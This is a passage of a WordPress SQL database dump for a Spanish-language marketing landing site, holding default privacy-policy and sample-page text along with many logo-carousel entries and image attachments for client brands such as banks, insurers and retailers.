seguimiento adicional de terceros, y supervisar tu interacción con ese contenido incrustado, incluido el seguimiento de tu interacción con el contenido incrustado si tienes una cuenta y estás conectado a esa web.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Con quién compartimos tus datos</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Si solicitas un restablecimiento de contraseña, tu dirección IP será incluida en el correo electrónico de restablecimiento.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Cuánto tiempo conservamos tus datos</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Si dejas un comentario, el comentario y sus metadatos se conservan indefinidamente. Esto es para que podamos reconocer y aprobar comentarios sucesivos automáticamente, en lugar de mantenerlos en una cola de moderación.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>De los usuarios que se registran en nuestra web (si los hay), también almacenamos la información personal que proporcionan en su perfil de usuario. Todos los usuarios pueden ver, editar o eliminar su información personal en cualquier momento (excepto que no pueden cambiar su nombre de usuario). Los administradores de la web también pueden ver y editar esa información.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Qué derechos tienes sobre tus datos</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Si tienes una cuenta o has dejado comentarios en esta web, puedes solicitar recibir un archivo de exportación de los datos personales que tenemos sobre ti, incluyendo cualquier dato que nos hayas proporcionado. También puedes solicitar que eliminemos cualquier dato personal que tengamos sobre ti. Esto no incluye ningún dato que estemos obligados a conservar con fines administrativos, legales o de seguridad.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Dónde se envían tus datos</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Los comentarios de los visitantes puede que los revise un servicio de detección automática de spam.</p><!-- /wp:paragraph -->','Política de privacidad','','draft','closed','open','','politica-privacidad','','','2022-09-26 17:16:52','2022-09-26 17:16:52','',0,'https://mktinsiders.com/landing2022/wp/?page_id=3',0,'page','',0),(5,1,'2022-09-26 17:19:15','2022-09-26 17:19:15','','Naranja','','publish','closed','closed','','naranja','','','2022-09-26 17:19:15','2022-09-26 17:19:15','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=5',0,'sp_logo_carousel','',0),(6,1,'2022-09-26 17:19:10','2022-09-26 17:19:10','','_logo-naranjax (2)','','inherit','open','closed','','_logo-naranjax-2','','','2022-09-26 17:19:10','2022-09-26 17:19:10','',5,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/logo-naranjax-2.png',0,'attachment','image/png',0),(7,1,'2022-09-26 17:23:09','2022-09-26 17:23:09','','Clientes','','publish','closed','closed','','clientes','','','2022-09-27 12:23:08','2022-09-27 12:23:08','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_lc_shortcodes&#038;p=7',0,'sp_lc_shortcodes','',0),(8,1,'2022-09-26 17:23:40','2022-09-26 17:23:40','','Recsa','','publish','closed','closed','','recsa','','','2022-09-26 17:23:40','2022-09-26 17:23:40','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=8',0,'sp_logo_carousel','',0),(9,1,'2022-09-26 17:23:35','2022-09-26 17:23:35','','1 (2)','','inherit','open','closed','','1-2','','','2022-09-26 17:23:35','2022-09-26 17:23:35','',8,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/1-2.png',0,'attachment','image/png',0),(10,1,'2022-09-26 17:23:58','2022-09-26 17:23:58','','Axion','','publish','closed','closed','','axion','','','2022-09-26 17:23:58','2022-09-26 17:23:58','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=10',0,'sp_logo_carousel','',0),(11,1,'2022-09-26 17:23:50','2022-09-26 17:23:50','','Axion_energy_logo (2)','','inherit','open','closed','','axion_energy_logo-2','','','2022-09-26 17:23:50','2022-09-26 17:23:50','',10,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Axion_energy_logo-2.png',0,'attachment','image/png',0),(12,1,'2022-09-26 17:24:19','2022-09-26 17:24:19','','Columbia','','publish','closed','closed','','columbia','','','2022-09-26 17:24:19','2022-09-26 17:24:19','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=12',0,'sp_logo_carousel','',0),(13,1,'2022-09-26 17:24:09','2022-09-26 17:24:09','','Banco Columbia (2)','','inherit','open','closed','','banco-columbia-2','','','2022-09-26 17:24:09','2022-09-26 17:24:09','',12,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Banco-Columbia-2.png',0,'attachment','image/png',0),(14,1,'2022-09-26 17:24:40','2022-09-26 17:24:40','','Hipotecario','','publish','closed','closed','','hipotecario','','','2022-09-26 17:24:40','2022-09-26 17:24:40','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=14',0,'sp_logo_carousel','',0),(15,1,'2022-09-26 17:24:30','2022-09-26 17:24:30','','Banco_Hipotecario (2)','','inherit','open','closed','','banco_hipotecario-2','','','2022-09-26 17:24:30','2022-09-26 17:24:30','',14,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Banco_Hipotecario-2.png',0,'attachment','image/png',0),(16,1,'2022-09-26 17:24:58','2022-09-26 17:24:58','','Galicia','','publish','closed','closed','','galicia','','','2022-09-26 17:24:58','2022-09-26 17:24:58','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=16',0,'sp_logo_carousel','',0),(17,1,'2022-09-26 17:24:52','2022-09-26 17:24:52','','Banco-Galicia1 (2)','','inherit','open','closed','','banco-galicia1-2','','','2022-09-26 17:24:52','2022-09-26 17:24:52','',16,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Banco-Galicia1-2.png',0,'attachment','image/png',0),(18,1,'2022-09-26 17:25:18','2022-09-26 17:25:18','','Bbva','','publish','closed','closed','','bbva','','','2022-09-26 17:25:18','2022-09-26 17:25:18','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=18',0,'sp_logo_carousel','',0),(19,1,'2022-09-26 17:25:10','2022-09-26 17:25:10','','BBVA-Logo (2)','','inherit','open','closed','','bbva-logo-2','','','2022-09-26 17:25:10','2022-09-26 17:25:10','',18,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/BBVA-Logo-2.png',0,'attachment','image/png',0),(20,1,'2022-09-26 17:25:39','2022-09-26 17:25:39','','Cabify','','publish','closed','closed','','cabify','','','2022-09-26 17:25:39','2022-09-26 17:25:39','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=20',0,'sp_logo_carousel','',0),(21,1,'2022-09-26 17:25:31','2022-09-26 17:25:31','','cabify-logo (2)','','inherit','open','closed','','cabify-logo-2','','','2022-09-26 17:25:31','2022-09-26 17:25:31','',20,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/cabify-logo-2.png',0,'attachment','image/png',0),(22,1,'2022-09-26 17:26:04','2022-09-26 17:26:04','','CasinoSantaFe','','publish','closed','closed','','casinosantafe','','','2022-09-26 17:26:04','2022-09-26 17:26:04','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=22',0,'sp_logo_carousel','',0),(23,1,'2022-09-26 17:25:55','2022-09-26 17:25:55','','Casino Santa Fe (2)','','inherit','open','closed','','casino-santa-fe-2','','','2022-09-26 17:25:55','2022-09-26 17:25:55','',22,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Casino-Santa-Fe-2.png',0,'attachment','image/png',0),(24,1,'2022-09-26 17:26:23','2022-09-26 17:26:23','','Castellaro','','publish','closed','closed','','castellaro','','','2022-09-26 17:26:23','2022-09-26 17:26:23','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=24',0,'sp_logo_carousel','',0),(25,1,'2022-09-26 17:26:17','2022-09-26 17:26:17','','castellaro automotores (2)','','inherit','open','closed','','castellaro-automotores-2','','','2022-09-26 17:26:17','2022-09-26 17:26:17','',24,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/castellaro-automotores-2.png',0,'attachment','image/png',0),(26,1,'2022-09-26 17:26:44','2022-09-26 17:26:44','','ClubLaNacion','','publish','closed','closed','','clublanacion','','','2022-09-26 17:26:44','2022-09-26 17:26:44','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=26',0,'sp_logo_carousel','',0),(27,1,'2022-09-26 17:26:34','2022-09-26 17:26:34','','club la nacion (2)','','inherit','open','closed','','club-la-nacion-2','','','2022-09-26 17:26:34','2022-09-26 17:26:34','',26,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/club-la-nacion-2.png',0,'attachment','image/png',0),(28,1,'2022-09-26 17:27:02','2022-09-26 17:27:02','','Credife','','publish','closed','closed','','credife','','','2022-09-26 17:27:02','2022-09-26 17:27:02','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=28',0,'sp_logo_carousel','',0),(29,1,'2022-09-26 17:26:55','2022-09-26 17:26:55','','credife (2)','','inherit','open','closed','','credife-2','','','2022-09-26 17:26:55','2022-09-26 17:26:55','',28,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/credife-2.png',0,'attachment','image/png',0),(30,1,'2022-09-26 17:27:34','2022-09-26 17:27:34','','Prosegur','','publish','closed','closed','','prosegur','','','2022-09-26 17:27:34','2022-09-26 17:27:34','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=30',0,'sp_logo_carousel','',0),(31,1,'2022-09-26 17:27:30','2022-09-26 17:27:30','','d062f77a8c15a46b1e84001f610e5021 (2)','','inherit','open','closed','','d062f77a8c15a46b1e84001f610e5021-2','','','2022-09-26 17:27:30','2022-09-26 17:27:30','',30,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/d062f77a8c15a46b1e84001f610e5021-2.png',0,'attachment','image/png',0),(32,1,'2022-09-26 17:27:50','2022-09-26 17:27:50','','Fiat','','publish','closed','closed','','fiat','','','2022-09-26 17:27:50','2022-09-26 17:27:50','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=32',0,'sp_logo_carousel','',0),(33,1,'2022-09-26 17:27:45','2022-09-26 17:27:45','','download (2)','','inherit','open','closed','','download-2','','','2022-09-26 17:27:45','2022-09-26 17:27:45','',32,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/download-2.png',0,'attachment','image/png',0),(34,1,'2022-09-26 17:28:08','2022-09-26 17:28:08','','Edesur','','publish','closed','closed','','edesur','','','2022-09-26 17:28:08','2022-09-26 17:28:08','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=34',0,'sp_logo_carousel','',0),(35,1,'2022-09-26 17:28:01','2022-09-26 17:28:01','','edesur (2)','','inherit','open','closed','','edesur-2','','','2022-09-26 17:28:01','2022-09-26 17:28:01','',34,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/edesur-2.png',0,'attachment','image/png',0),(36,1,'2022-09-26 17:28:26','2022-09-26 17:28:26','','Experta','','publish','closed','closed','','experta','','','2022-09-26 17:28:26','2022-09-26 17:28:26','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=36',0,'sp_logo_carousel','',0),(37,1,'2022-09-26 17:28:19','2022-09-26 17:28:19','','experta art (2)','','inherit','open','closed','','experta-art-2','','','2022-09-26 17:28:19','2022-09-26 17:28:19','',36,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/experta-art-2.png',0,'attachment','image/png',0),(38,1,'2022-09-26 17:28:59','2022-09-26 17:28:59','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-twentytwentytwo','','','2022-09-26 17:28:59','2022-09-26 17:28:59','',0,'https://mktinsiders.com/landing2022/wp/2022/09/26/wp-global-styles-twentytwentytwo/',0,'wp_global_styles','',0),(39,1,'2022-09-26 17:29:07','2022-09-26 17:29:07','<!-- wp:paragraph -->\n<p>Esta es una página de ejemplo. Es diferente a una entrada del blog porque permanecerá en un solo lugar y aparecerá en la navegación de tu sitio (en la mayoría de los temas). La mayoría de las personas comienzan con una página «Acerca de» que les presenta a los visitantes potenciales del sitio. Podrías decir algo así:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>¡Bienvenido! Soy camarero de día, aspirante a actor de noche y esta es mi web. Vivo en Mairena del Alcor, tengo un perro que se llama Firulais y me gusta el rebujito. (Y las tardes largas con café).</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>…o algo así:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>La empresa «Mariscos Recio» fue fundada por Antonio Recio Mata. Empezó siendo una pequeña empresa que suministraba marisco a hoteles y restaurantes, pero poco a poco se ha ido transformando en un gran imperio. Mariscos Recio, el mar al mejor precio.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>Como nuevo usuario de WordPress, deberías ir a <a href=\"https://mktinsiders.com/landing2022/wp/wp-admin/\">tu escritorio</a> para borrar esta página y crear nuevas páginas para tu contenido. ¡Pásalo bien!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[logocarousel id=\"7\"]\n<!-- /wp:shortcode -->','Página de ejemplo','','inherit','closed','closed','','2-revision-v1','','','2022-09-26 17:29:07','2022-09-26 17:29:07','',2,'https://mktinsiders.com/landing2022/wp/?p=39',0,'revision','',0),(40,1,'2022-09-27 12:04:21','2022-09-27 12:04:21','','Federacion','','publish','closed','closed','','federacion','','','2022-09-27 12:04:21','2022-09-27 12:04:21','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=40',0,'sp_logo_carousel','',0),(41,1,'2022-09-27 12:04:17','2022-09-27 12:04:17','','federacion-patronal-seguros (2)','','inherit','open','closed','','federacion-patronal-seguros-2','','','2022-09-27 12:04:17','2022-09-27 12:04:17','',40,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/federacion-patronal-seguros-2.png',0,'attachment','image/png',0),(42,1,'2022-09-27 12:04:39','2022-09-27 12:04:39','','Ford','','publish','closed','closed','','ford','','','2022-09-27 12:04:39','2022-09-27 12:04:39','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=42',0,'sp_logo_carousel','',0),(43,1,'2022-09-27 12:04:32','2022-09-27 12:04:32','','Ford (2)','','inherit','open','closed','','ford-2','','','2022-09-27 12:04:32','2022-09-27 12:04:32','',42,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Ford-2.png',0,'attachment','image/png',0),(44,1,'2022-09-27 12:05:06','2022-09-27 12:05:06','','Fravega','','publish','closed','closed','','44','','','2022-09-27 12:05:14','2022-09-27 12:05:14','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=44',0,'sp_logo_carousel','',0),(45,1,'2022-09-27 12:05:01','2022-09-27 12:05:01','','fravega (2)','','inherit','open','closed','','fravega-2','','','2022-09-27 12:05:01','2022-09-27 12:05:01','',44,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/fravega-2.png',0,'attachment','image/png',0),(46,1,'2022-09-27 12:05:35','2022-09-27 12:05:35','','Galeno','','publish','closed','closed','','galeno','','','2022-09-27 12:05:35','2022-09-27 12:05:35','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=46',0,'sp_logo_carousel','',0),(47,1,'2022-09-27 12:05:26','2022-09-27 12:05:26','','galeno-seguros (2)','','inherit','open','closed','','galeno-seguros-2','','','2022-09-27 12:05:26','2022-09-27 12:05:26','',46,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/galeno-seguros-2.png',0,'attachment','image/png',0),(48,1,'2022-09-27 12:06:16','2022-09-27 12:06:16','','HFA','','publish','closed','closed','','hfa','','','2022-09-27 12:06:16','2022-09-27 12:06:16','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=48',0,'sp_logo_carousel','',0),(49,1,'2022-09-27 12:05:47','2022-09-27 12:05:47','','HFA (2)','','inherit','open','closed','','hfa-2','','','2022-09-27 12:05:47','2022-09-27 12:05:47','',48,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/HFA-2.png',0,'attachment','image/png',0),(50,1,'2022-09-27 12:06:38','2022-09-27 12:06:38','','ICBC','','publish','closed','closed','','icbc','','','2022-09-27 12:06:38','2022-09-27 12:06:38','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=50',0,'sp_logo_carousel','',0),(51,1,'2022-09-27 12:06:29','2022-09-27 12:06:29','','ICBC_logo (2)','','inherit','open','closed','','icbc_logo-2','','','2022-09-27 12:06:29','2022-09-27 12:06:29','',50,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/ICBC_logo-2.png',0,'attachment','image/png',0),(52,1,'2022-09-27 12:06:57','2022-09-27 12:06:57','','La Segunda','','publish','closed','closed','','la-segunda','','','2022-09-27 12:06:57','2022-09-27 12:06:57','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=52',0,'sp_logo_carousel','',0),(53,1,'2022-09-27 12:06:48','2022-09-27 12:06:48','','La-Segunda-Seguros- (2)','','inherit','open','closed','','la-segunda-seguros-2','','','2022-09-27 12:06:48','2022-09-27 12:06:48','',52,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/La-Segunda-Seguros-2.png',0,'attachment','image/png',0),(54,1,'2022-09-27 12:07:20','2022-09-27 12:07:20','','Autofrance','','publish','closed','closed','','autofrance','','','2022-09-27 12:07:20','2022-09-27 12:07:20','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=54',0,'sp_logo_carousel','',0),(55,1,'2022-09-27 12:07:10','2022-09-27 12:07:10','','logo (1)','','inherit','open','closed','','logo-1','','','2022-09-27 12:07:10','2022-09-27 12:07:10','',54,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/logo-1.png',0,'attachment','image/png',0),(56,1,'2022-09-27 12:07:44','2022-09-27 12:07:44','','PrevencionSalud','','publish','closed','closed','','prevencionsalud','','','2022-09-27 12:07:44','2022-09-27 12:07:44','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=56',0,'sp_logo_carousel','',0),(57,1,'2022-09-27 12:07:35','2022-09-27 12:07:35','','logo (3)','','inherit','open','closed','','logo-3','','','2022-09-27 12:07:35','2022-09-27 12:07:35','',56,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/logo-3.png',0,'attachment','image/png',0),(58,1,'2022-09-27 12:12:37','2022-09-27 12:12:37','','Verisure','','publish','closed','closed','','verisure','','','2022-09-27 12:12:37','2022-09-27 12:12:37','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=58',0,'sp_logo_carousel','',0),(59,1,'2022-09-27 12:12:30','2022-09-27 12:12:30','','logo_horizontal_4 (2)','','inherit','open','closed','','logo_horizontal_4-2','','','2022-09-27 12:12:30','2022-09-27 12:12:30','',58,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/logo_horizontal_4-2.png',0,'attachment','image/png',0),(60,1,'2022-09-27 12:12:59','2022-09-27 12:12:59','','BancoComafi','','publish','closed','closed','','bancocomafi','','','2022-09-27 12:12:59','2022-09-27 12:12:59','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=60',0,'sp_logo_carousel','',0),(61,1,'2022-09-27 12:12:51','2022-09-27 12:12:51','','Logo_Oficial_Banco_Comafi (2)','','inherit','open','closed','','logo_oficial_banco_comafi-2','','','2022-09-27 12:12:51','2022-09-27 12:12:51','',60,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Logo_Oficial_Banco_Comafi-2.png',0,'attachment','image/png',0),(62,1,'2022-09-27 12:13:18','2022-09-27 12:13:18','','Espasa','','publish','closed','closed','','espasa','','','2022-09-27 12:13:18','2022-09-27 12:13:18','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=62',0,'sp_logo_carousel','',0),(63,1,'2022-09-27 12:13:11','2022-09-27 12:13:11','','logo-espasa (2)','','inherit','open','closed','','logo-espasa-2','','','2022-09-27 12:13:11','2022-09-27 12:13:11','',62,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/logo-espasa-2.png',0,'attachment','image/png',0),(64,1,'2022-09-27 12:13:37','2022-09-27 12:13:37','','EstudioGeller','','publish','closed','closed','','estudiogeller','','','2022-09-27 12:13:37','2022-09-27 12:13:37','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=64',0,'sp_logo_carousel','',0),(65,1,'2022-09-27 12:13:31','2022-09-27 12:13:31','','logo-geller (2)','','inherit','open','closed','','logo-geller-2','','','2022-09-27 12:13:31','2022-09-27 12:13:31','',64,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/logo-geller-2.png',0,'attachment','image/png',0),(66,1,'2022-09-27 12:14:03','2022-09-27 12:14:03','','RecuperoCrediticio','','publish','closed','closed','','recuperocrediticio','','','2022-09-27 12:14:03','2022-09-27 12:14:03','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=66',0,'sp_logo_carousel','',0),(67,1,'2022-09-27 12:13:54','2022-09-27 12:13:54','','Logo-Recupero-png (2)','','inherit','open','closed','','logo-recupero-png-2','','','2022-09-27 12:13:54','2022-09-27 12:13:54','',66,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Logo-Recupero-png-2.png',0,'attachment','image/png',0),(68,1,'2022-09-27 12:14:24','2022-09-27 12:14:24','','Macro','','publish','closed','closed','','macro','','','2022-09-27 12:14:24','2022-09-27 12:14:24','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=68',0,'sp_logo_carousel','',0),(69,1,'2022-09-27 12:14:18','2022-09-27 12:14:18','','macro (2)','','inherit','open','closed','','macro-2','','','2022-09-27 12:14:18','2022-09-27 12:14:18','',68,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/macro-2.png',0,'attachment','image/png',0),(70,1,'2022-09-27 12:14:43','2022-09-27 12:14:43','','Makro','','publish','closed','closed','','makro','','','2022-09-27 12:14:43','2022-09-27 12:14:43','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=70',0,'sp_logo_carousel','',0),(71,1,'2022-09-27 12:14:37','2022-09-27 12:14:37','','makro (2)','','inherit','open','closed','','makro-2','','','2022-09-27 12:14:37','2022-09-27 12:14:37','',70,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/makro-2.png',0,'attachment','image/png',0),(72,1,'2022-09-27 12:15:03','2022-09-27 12:15:03','','Medife','','publish','closed','closed','','medife','','','2022-09-27 12:15:03','2022-09-27 12:15:03','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=72',0,'sp_logo_carousel','',0),(73,1,'2022-09-27 12:14:57','2022-09-27 12:14:57','','medife (2)','','inherit','open','closed','','medife-2','','','2022-09-27 12:14:57','2022-09-27 12:14:57','',72,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/medife-2.png',0,'attachment','image/png',0),(74,1,'2022-09-27 12:15:21','2022-09-27 12:15:21','','Megatone','','publish','closed','closed','','megatone','','','2022-09-27 12:15:21','2022-09-27 12:15:21','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=74',0,'sp_logo_carousel','',0),(75,1,'2022-09-27 12:15:15','2022-09-27 12:15:15','','megatone (2)','','inherit','open','closed','','megatone-2','','','2022-09-27 12:15:15','2022-09-27 12:15:15','',74,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/megatone-2.png',0,'attachment','image/png',0),(76,1,'2022-09-27 12:15:39','2022-09-27 12:15:39','','MetroGas','','publish','closed','closed','','metrogas','','','2022-09-27 12:15:39','2022-09-27 12:15:39','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=76',0,'sp_logo_carousel','',0),(77,1,'2022-09-27 12:15:32','2022-09-27 12:15:32','','metrogas (2)','','inherit','open','closed','','metrogas-2','','','2022-09-27 12:15:32','2022-09-27 12:15:32','',76,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/metrogas-2.png',0,'attachment','image/png',0),(78,1,'2022-09-27 12:16:03','2022-09-27 12:16:03','','Molinos','','publish','closed','closed','','molinos','','','2022-09-27 12:16:03','2022-09-27 12:16:03','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=78',0,'sp_logo_carousel','',0),(79,1,'2022-09-27 12:15:55','2022-09-27 12:15:55','','molinos rio plata (2)','','inherit','open','closed','','molinos-rio-plata-2','','','2022-09-27 12:15:55','2022-09-27 12:15:55','',78,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/molinos-rio-plata-2.png',0,'attachment','image/png',0),(80,1,'2022-09-27 12:16:27','2022-09-27 12:16:27','','MolinosVictoria','','publish','closed','closed','','molinosvictoria','','','2022-09-27 12:16:27','2022-09-27 12:16:27','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=80',0,'sp_logo_carousel','',0),(81,1,'2022-09-27 12:16:15','2022-09-27 12:16:15','','molinos victoria (2)','','inherit','open','closed','','molinos-victoria-2','','','2022-09-27 12:16:15','2022-09-27 12:16:15','',80,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/molinos-victoria-2.png',0,'attachment','image/png',0),(82,1,'2022-09-27 12:16:50','2022-09-27 12:16:50','','Mostaza','','publish','closed','closed','','mostaza','','','2022-09-27 12:16:50','2022-09-27 12:16:50','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=82',0,'sp_logo_carousel','',0),(83,1,'2022-09-27 12:16:45','2022-09-27 12:16:45','','Mostaza_2022_logo (2)','','inherit','open','closed','','mostaza_2022_logo-2','','','2022-09-27 12:16:45','2022-09-27 12:16:45','',82,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Mostaza_2022_logo-2.png',0,'attachment','image/png',0),(84,1,'2022-09-27 12:17:09','2022-09-27 12:17:09','','Musimundo','','publish','closed','closed','','musimundo','','','2022-09-27 12:17:09','2022-09-27 12:17:09','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=84',0,'sp_logo_carousel','',0),(85,1,'2022-09-27 12:17:02','2022-09-27 12:17:02','','Musimundo_(3)','','inherit','open','closed','','musimundo_3','','','2022-09-27 12:17:02','2022-09-27 12:17:02','',84,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/Musimundo_3.png',0,'attachment','image/png',0),(86,1,'2022-09-27 12:17:28','2022-09-27 12:17:28','','Epec','','publish','closed','closed','','epec','','','2022-09-27 12:17:28','2022-09-27 12:17:28','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=86',0,'sp_logo_carousel','',0),(87,1,'2022-09-27 12:17:22','2022-09-27 12:17:22','','navbar-logo (2)','','inherit','open','closed','','navbar-logo-2','','','2022-09-27 12:17:22','2022-09-27 12:17:22','',86,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/navbar-logo-2.png',0,'attachment','image/png',0),(88,1,'2022-09-27 12:17:53','2022-09-27 12:17:53','','Paktar','','publish','closed','closed','','paktar','','','2022-09-27 12:17:53','2022-09-27 12:17:53','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=88',0,'sp_logo_carousel','',0),(89,1,'2022-09-27 12:17:42','2022-09-27 12:17:42','','paktar-logo (2)','','inherit','open','closed','','paktar-logo-2','','','2022-09-27 12:17:42','2022-09-27 12:17:42','',88,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/paktar-logo-2.png',0,'attachment','image/png',0),(90,1,'2022-09-27 12:18:13','2022-09-27 12:18:13','','EstudioPortela','','publish','closed','closed','','estudioportela','','','2022-09-27 12:18:13','2022-09-27 12:18:13','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=90',0,'sp_logo_carousel','',0),(91,1,'2022-09-27 12:18:06','2022-09-27 12:18:06','','portela_logo (2)','','inherit','open','closed','','portela_logo-2','','','2022-09-27 12:18:06','2022-09-27 12:18:06','',90,'https://mktinsiders.com/landing2022/wp/wp-content/uploads/2022/09/portela_logo-2.png',0,'attachment','image/png',0),(92,1,'2022-09-27 12:18:35','2022-09-27 12:18:35','','ProvinciaSeguros','','publish','closed','closed','','provinciaseguros','','','2022-09-27 12:18:35','2022-09-27 12:18:35','',0,'https://mktinsiders.com/landing2022/wp/?post_type=sp_logo_carousel&#038;p=92',0,'sp_logo_carousel','',0),(93,1,'2022-09-27 12:18:26','2022-09-27 12:18:26','','pseguros2-1 (2)','','inherit','open','closed','','pseguros2-1-2','','','2022-09-27 12:18:26','2022-09-27 